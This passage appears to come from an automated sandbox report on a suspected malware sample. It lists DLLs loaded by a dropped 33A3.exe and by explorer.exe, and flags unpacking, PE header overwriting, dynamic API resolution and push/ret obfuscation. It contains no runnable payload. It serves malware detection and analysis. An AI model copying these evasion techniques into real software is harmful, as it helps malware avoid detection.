Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe	Section loaded: wer.dll
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: credui.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msvcr100.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\XVM5nluelx.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: XVM5nluelx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 33A3.exe, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Unpacked PE file: 0.2.XVM5nluelx.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dejcbcc	Unpacked PE file: 4.2.dejcbcc.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 9.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 14.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 16.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 23.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 26.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 9.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 14.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 16.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 23.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 26.2.33A3.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

9_2_00412220

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026D2 push ebx; ret	0_2_004026EA
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026ED pushad ; ret	0_2_004026F4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026F7 push ebx; ret	0_2_00402714
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402745 push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040273B push edi; ret	0_2_00402742
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402595 push ss; ret	0_2_0040259C
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004027BB push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E22822 push edi; ret	0_2_02E227D4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E225FC push ss; ret	0_2_02E22603
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E227A2 push edi; ret	0_2_02E227A9
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E215A4 push AFD66869h; ret	0_2_02E215A9
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E227AC push edi; ret	0_2_02E227D4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E22754 pushad ; ret	0_2_02E2275B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E2275E push ebx; ret	0_2_02E2277B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E22739 push ebx; ret	0_2_02E22751
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED44EA pushad ; iretd	0_2_02ED44EB
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9CFD push ecx; retf	0_2_02ED9CFF
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9A8D push eax; iretd	0_2_02ED9A8E
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9C75 push esi; iretd	0_2_02ED9C77
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9C71 push ds; retf	0_2_02ED9C73
